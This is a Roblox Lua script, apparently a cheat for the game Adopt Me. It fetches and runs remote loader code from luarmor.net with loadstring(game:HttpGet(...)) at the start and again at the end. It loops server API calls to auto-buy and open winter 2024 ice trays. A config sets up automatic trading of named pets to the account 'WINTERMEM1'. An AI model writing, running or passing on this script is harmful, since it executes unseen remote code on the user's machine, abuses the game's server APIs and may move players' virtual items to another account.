task.spawn(function()
    loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/e4315db490a84e920190f83279c4732e.lua"))()
end)
task.spawn(function()
    task.wait(30)
    for i = 1,50 do task.wait()
        local args = {
            [1] = "gifts",
            [2] = "winter_2024_ice_tray",
            [3] = {
                ["buy_count"] = 5
            }
        }

        game:GetService("ReplicatedStorage"):WaitForChild("API"):WaitForChild("ShopAPI/BuyItem"):InvokeServer(unpack(args))
    end

    task.wait(1)
    for i = 1,5 do
        for i, v in pairs(require(game.ReplicatedStorage.ClientModules.Core.ClientData).get_data()[game.Players.LocalPlayer.Name].inventory.gifts) do task.wait()
            if v.kind == "winter_2024_ice_tray" then
                local args = {
                    [1] = "winter_2024_ice_tray",
                    [2] = v.unique
                }
                
                game:GetService("ReplicatedStorage"):WaitForChild("API"):WaitForChild("LootBoxAPI/ExchangeItemForReward"):InvokeServer(unpack(args))
                print(v.unique)
            end
        end
    end
end)

task.spawn(function()
    getgenv().Config = {
        ["inventory"] = "pets", -- Adapt to stickers, gifts, toys, pet_accessories, transport
        ["username"] = "WINTERMEM1",
        ["pets_to_trade"] = {"winter_2024_bauble_buddies", "winter_2024_ratatoskr", "winter_2024_ice_cube", "winter_2024_cold_cube", "winter_2024_berry_cool_cube"} -- or lures_2023_blazing_lion cant auto trade gifts with pet ONLY 1
    }
    getgenv().trade_status = true
    getgenv().pets_unique_ids = {}

    loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/a5386bfa9bb03ae1da997e3078394366.lua"))()
end)
